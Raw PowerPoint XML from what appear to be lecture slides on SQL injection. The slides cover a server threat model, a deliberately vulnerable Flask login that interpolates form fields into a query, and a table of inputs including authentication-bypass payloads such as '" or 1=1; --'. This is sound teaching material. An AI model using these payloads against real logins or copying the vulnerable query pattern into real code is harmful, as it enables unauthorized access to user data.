          <a:xfrm>
            <a:off x="1129702" y="4104311"/>
            <a:ext cx="902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People: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A15B896-2393-4C1E-BAB8-6B0503C3F1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878274"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2032000" y="4104311"/>
          <a:ext cx="812799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9985264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56241064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1433944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 (string)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 (integer)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employed (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>boolean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551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Christo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306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3852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9298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494481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905BA41-EE6E-4F80-8636-447F22DD7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ECD8A6-945A-4663-9D24-7E0287644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8465" y="3298722"/>
            <a:ext cx="8495070" cy="17844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SQL Injection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5C7ACE-9E25-428E-A99E-7CDF262FD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48465" y="5258851"/>
            <a:ext cx="8495070" cy="90400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Blind Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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Mitigations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D7549B2-EE05-4558-8C64-AC46755F2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25914" y="889251"/>
            <a:ext cx="2140172" cy="214017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phic 8" descr="Wind Chime">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6D92435-7003-4889-851A-618EC3F939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8264" y="1371601"/>
            <a:ext cx="1175474" cy="117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20550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Injection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SQL queries often involve untrusted data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>App is responsible for interpolating user data into queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insufficient sanitization could lead to modification of query semantics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Possible attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Confidentiality – modify queries to return unauthorized data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integrity – modify queries to perform unauthorized updates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication – modify query to bypass authentication checks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18170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4500" dirty="0"/>
              <a:t>Server Threat </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4500" dirty="0"/>
              <a:t>Model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Attacker’s goal:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steal or modify information in the server-side database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Web server’s goal: protect sensitive data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Confidentiality (e.g. passwords, private user content, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integrity (e.g. passwords, admin status, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authenticity (e.g., password checks)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Attacker’s capability: submit arbitrary data to the website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>POSTed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> forms, URL parameters, cookie values, HTTP request headers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24666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 Model Assumptions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90688"/>
            <a:ext cx="10515600" cy="51673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Web server is free from vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Apache and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> are reliable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 file inclusion vulnerabilities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Server’s OS is free from vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No remote code exploits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Remote login is secured</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No brute forcing the admin’s SSH password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80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3A298-13E9-40EB-95EA-5D3F6B236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Website Login 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395ABF-4D7D-4B36-B5BA-77FAD8F31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01841" y="2480375"/>
            <a:ext cx="5894777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  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if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flask.request.method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> == 'POST’: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>get_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()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cur = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>db.execute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  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     'select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user_tbl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> where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  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      user="%s" and pw="%s";'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> % (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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flask.request.form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'username’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>],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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flask.request.form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'password’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]))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user = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cur.fetchone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()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chemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> user == None: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error = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'Invalid username or password’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chemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin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…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CAE8FF7-D9DA-4BC0-84AE-0A57F6C431AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="421610" y="2480375"/>
            <a:ext cx="4402261" cy="3575468"/>
            <a:chOff x="421610" y="1938309"/>
            <a:chExt cx="4402261" cy="357546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E070B3A-8712-4C3C-B780-D5D19D9052D2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="421610" y="1938309"/>
              <a:ext cx="4402261" cy="357546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6E08374-EA7F-4810-B4B6-53D5ECC545D6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="580398" y="2118999"/>
              <a:ext cx="28098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u="sng" dirty="0"/>
                <a:t>Enter the website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357BD397-BD7D-4B64-9CB6-6580C741A98E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="695382" y="2743200"/>
              <a:ext cx="2984120" cy="372331"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575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Username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A04EA23-E234-4799-ADE1-99FBE331EA4D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="695381" y="3260944"/>
              <a:ext cx="2984119" cy="372331"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575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Password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EF5F4004-6033-4D88-B98E-C0037391EF0F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2567984" y="3778688"/>
              <a:ext cx="1111516" cy="51469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Login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3FAB9D6-6753-4E75-B343-B51B8CD36DE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1706273" y="1760656"/>
            <a:ext cx="1723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Client-side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6858FF-448F-4024-BD91-BDE1AE3CA60D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7640262" y="1760656"/>
            <a:ext cx="1817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Server-side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D7B74FED-6CDD-4BF9-8767-1FA4125050C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19666537">
            <a:off x="1265612" y="4709444"/>
            <a:ext cx="1514007" cy="77199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/>
              <a:t>Click!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553F12-DEBD-47F2-B5F3-57E5C628DB17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5825874" y="2776331"/>
            <a:ext cx="5458352" cy="2564296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0DCF5B4-D9DE-4732-ADF9-0340AFC4D310}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6256570" y="3471430"/>
            <a:ext cx="4093378" cy="782517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8D69B1-586F-4DCE-A6B5-ADFBC15022D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6354418" y="3849757"/>
            <a:ext cx="1417982" cy="404190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B758903-C42F-42AA-A630-A68AE0984FCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8282609" y="3849757"/>
            <a:ext cx="1093304" cy="404190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D810BBD-F5A0-49B2-9ED6-6F22D83CD8ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6619462" y="4253946"/>
            <a:ext cx="4227442" cy="695099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1975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4" grpId="1" animBg="1"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="17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1178D-AB97-444D-8DB0-B4D17421C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Login Examples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360186-C61F-4D2C-90E6-D7F6E7D62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85854"/>
            <a:ext cx="10515600" cy="5507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'select * from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user_tbl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 where user="%s" and pw="%s";'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11EE500-AD5C-45BB-B874-62F6709AD8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343724"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="240955" y="3002930"/>
          <a:ext cx="1171009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3476">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="691516119"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2208551">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1434083422"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="7598063">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="16039458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n-lt"/>
                        </a:rPr>
                        <a:t>form[‘username’]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n-lt"/>
                        </a:rPr>
                        <a:t>form[‘password’]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n-lt"/>
                        </a:rPr>
                        <a:t>Resulting query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3304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</a:rPr>
                        <a:t>alice</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800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</a:rPr>
                        <a:t>123456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</a:rPr>
                        <a:t>‘… where user=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"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>alice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"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> and pw=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"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>123456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"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>;’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9793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</a:rPr>
                        <a:t>bob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</a:rPr>
                        <a:t>qwerty1#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onsolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>‘… where user=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"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>bob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"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> and pw=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"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>qwery1#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"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>;’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3255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</a:rPr>
                        <a:t>goofy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</a:rPr>
                        <a:t>a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"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>bc</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800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onsolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>‘… where user=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"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>goofy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"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> and pw=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"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>a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"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>bc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"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>;’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2182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</a:rPr>
                        <a:t>weird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</a:rPr>
                        <a:t>abc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>" or pw="123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onsolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>‘… where user=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“</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>weird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"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> and pw=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"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>abc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" or pw="123"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>;’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1512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</a:rPr>
                        <a:t>eve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</a:rPr>
                        <a:t>" or 1=1; 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onsolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>‘… where user=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“</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>eve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"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> and pw=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"" or 1=1; --"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>;’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3026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</a:rPr>
                        <a:t>mallory</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>"; 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onsolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>‘… where user=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"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m</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>allory</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>"; --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"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> and pw=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""</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>;’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9950720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29A87968-31E9-4487-8461-BE2CD6CE2231}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240955" y="3748816"/>
            <a:ext cx="11710090" cy="3767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C91443A3-1DC7-4C5E-BA30-2E76EB44FDE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8070812" y="1951122"/>
            <a:ext cx="3602845" cy="1602445"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -31623"/>
              <a:gd name="adj2" fmla="val 7411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Incorrect syntax, too many double quotes. Server returns 500 error.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C63D83-D8FC-46D2-9B45-3E0AB44809B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240955" y="4116833"/>
            <a:ext cx="11710090" cy="3767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64DB4A-6A90-42B5-8059-9DD3B256613E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="225263" y="4482660"/>
            <a:ext cx="11710090" cy="3767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24F1CF6-602E-49DB-9BE2-B09EB4586F85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7994156" y="4009250"/>
            <a:ext cx="1067712" cy="613250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0316041-E7E4-4501-A325-7DA8AC9DDC46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240955" y="4858635"/>
            <a:ext cx="11710090" cy="3767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D2A7E3-356D-495C-BA0B-ADD0A7AA04E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240955" y="5236913"/>
            <a:ext cx="11710090" cy="3767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DE15CEB-5F33-4429-BC95-216647AB33F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7536955" y="4739581"/>
            <a:ext cx="2510493" cy="613250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3F2D4A8-BAAA-4762-B3C2-103E0B3EFAF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7490414" y="5113953"/>
            <a:ext cx="2381820" cy="613250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E12C22F6-ECD2-4859-B15B-86AD5157C242}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8070812" y="3192187"/>
            <a:ext cx="4044496" cy="1130605"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -27426"/>
              <a:gd name="adj2" fmla="val 7847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1=1 is always true ;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>-- comments out extra quote</a:t>
            </a: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AEBE49D4-5C9E-49D0-A933-FD91927D5994}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8070812" y="3626273"/>
            <a:ext cx="4044496" cy="1130605"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -27426"/>
              <a:gd name="adj2" fmla="val 7847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None of this is evaluated. Who needs password checks? ;)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16658204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7" grpId="1" animBg="1"/>
      <p:bldP spid="8" grpId="0" animBg="1"/>
      <p:bldP spid="9" grpId="0" animBg="1"/>
      <p:bldP spid="6" grpId="0" animBg="1"/>
      <p:bldP spid="6" grpId="1" animBg="1"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="10" grpId="0" animBg="1"/>
      <p:bldP spid="10" grpId="1" animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="11" grpId="0" animBg="1"/>
      <p:bldP spid="11" grpId="1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62" y="266953"/>
